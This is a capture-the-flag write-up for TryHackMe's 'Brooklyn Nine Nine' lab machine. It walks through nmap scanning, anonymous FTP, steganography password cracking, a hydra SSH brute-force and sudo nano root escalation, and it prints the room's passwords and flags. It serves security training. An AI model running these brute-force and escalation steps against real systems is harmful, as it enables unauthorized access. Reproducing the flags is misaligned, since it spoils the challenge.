TryHackMe - Brooklyn Nine Nine - Writeup
This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.
Nmap Scan
root@ip-10-10-251-78:~# nmap -sCV -A 10.10.201.193 -T4
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-18 11:05 BST
Nmap scan report for ip-10-10-201-193.eu-west-1.compute.internal (10.10.201.193)
Host is up (0.00056s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.251.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:44:F8:0D:32:A3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/18%OT=21%CT=1%CU=44079%PV=Y%DS=1%DC=D%G=Y%M=0244F8%T
OS:M=60CC7018%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms ip-10-10-201-193.eu-west-1.compute.internal (10.10.201.193)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds
Login to FTP with username anonymous and get the file called note_to_jake.txt
root@ip-10-10-251-78:~# ftp 10.10.201.193
Connected to 10.10.201.193.
220 (vsFTPd 3.0.3)
Name (10.10.201.193:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.07 secs (1.6486 kB/s)
root@ip-10-10-251-78:~# cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
nine nine interesting let’s go to web part now.
From the web view source we found a comment said Have you ever heard of steganography?
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
height: 100%;
margin: 0;
}
.bg {
/* The image used */
background-image: url("brooklyn99.jpg");
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
</style>
</head>
<body>
<div class="bg"></div>
<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->
</body>
</html>
Download the image from the website http://10.10.201.193/brooklyn99.jpg try to extract data with steghide
root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase:
steghide: can not uncompress data. compressed data is corrupted.
It require password let’s crack the password with stegcracker
root@ip-10-10-251-78:~/Downloads# stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)
Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20650 passwords
Your file has been written to: brooklyn99.jpg.out
admin
From the ftp text we get nine nine indicating to brooklyn99.jpg now extract the item from the image file with password admin we cracked.
root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase:
wrote extracted data to "note.txt".
root@ip-10-10-251-78:~/Downloads# cat note.txt
Holts Password:
fluffydog12@ninenine
Enjoy!!
Tried to login to SSH as jake using the password we found but it didn’t work. Let’s bruteforce the password of SSH.
root@ip-10-10-251-78:~/Downloads# hydra -t 16 -l jake -P /usr/share/wordlists/rockyou.txt 10.10.201.193 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-06-18 11:52:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.201.193:22/
[22][ssh] host: 10.10.201.193 login: jake password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2021-06-18 11:52:43
We got password for jake lets login with 987654321
root@ip-10-10-251-78:~/Downloads# ssh jake@10.10.201.193
jake@10.10.201.193's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd /home
jake@brookly_nine_nine:/home$ l
amy/ holt/ jake/
As we know holt password and I didn’t found any user.txt in the machine
jake@brookly_nine_nine:~$ su holt
Password:
holt@brookly_nine_nine:/home/jake$
holt@brookly_nine_nine:/home/jake$ ls
holt@brookly_nine_nine:/home/jake$ cd ..
holt@brookly_nine_nine:/home$ ls
amy holt jake
holt@brookly_nine_nine:/home$ cd holt
holt@brookly_nine_nine:~$ ls
nano.save user.txt
holt@brookly_nine_nine:~$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
Now get root, My first approch is to check sudo -l to check sudo lists
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano
holt can run nano as root. Go to GTFOBins nano
Follow up the command you’ll get root
# whoami
root
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845
Enjoy!!
Room Link: Brooklyn Nine Nine
Written on June 18, 2021